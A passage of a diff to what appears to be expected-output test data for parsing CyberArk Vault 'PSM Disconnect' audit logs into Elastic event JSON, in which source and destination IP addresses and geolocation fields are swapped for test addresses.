\u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1593,22 +1407,22 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "692fe25f-f940-4170-8ea4-5241b35173f0", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:00:05" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 06:18:36", "desc": "PSM Disconnect" @@ -1620,8 +1434,8 @@ "event": { "severity": 2, "duration": 5000000000, - "ingested": "2021-06-09T10:24:31.624824800Z", - "original": "\u003c5\u003e1 2021-03-15T13:18:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:36\",\"IsoTimestamp\":\"2021-03-15T13:18:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813833500Z", + "original": "\u003c5\u003e1 2021-03-15T13:18:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:36\",\"IsoTimestamp\":\"2021-03-15T13:18:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -1644,39 +1458,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1693,7 +1486,7 @@ }, "@timestamp": "2021-03-15T14:08:11.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -1704,16 +1497,15 @@ "adrian" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:08:11Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:11\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:11Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:11\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:11Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1725,22 +1517,22 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "f5725611-ca57-4a2a-a089-f45b3174a358", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:00:06" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 07:08:11", "desc": "PSM Disconnect" @@ -1752,8 +1544,8 @@ "event": { "severity": 2, "duration": 6000000000, - "ingested": "2021-06-09T10:24:31.624827200Z", - "original": "\u003c5\u003e1 2021-03-15T14:08:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:11\",\"IsoTimestamp\":\"2021-03-15T14:08:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813838800Z", + "original": "\u003c5\u003e1 2021-03-15T14:08:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:11\",\"IsoTimestamp\":\"2021-03-15T14:08:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -1776,39 +1568,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1825,7 +1596,7 @@ }, "@timestamp": "2021-03-15T14:08:36.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1836,16 +1607,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:08:36Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n 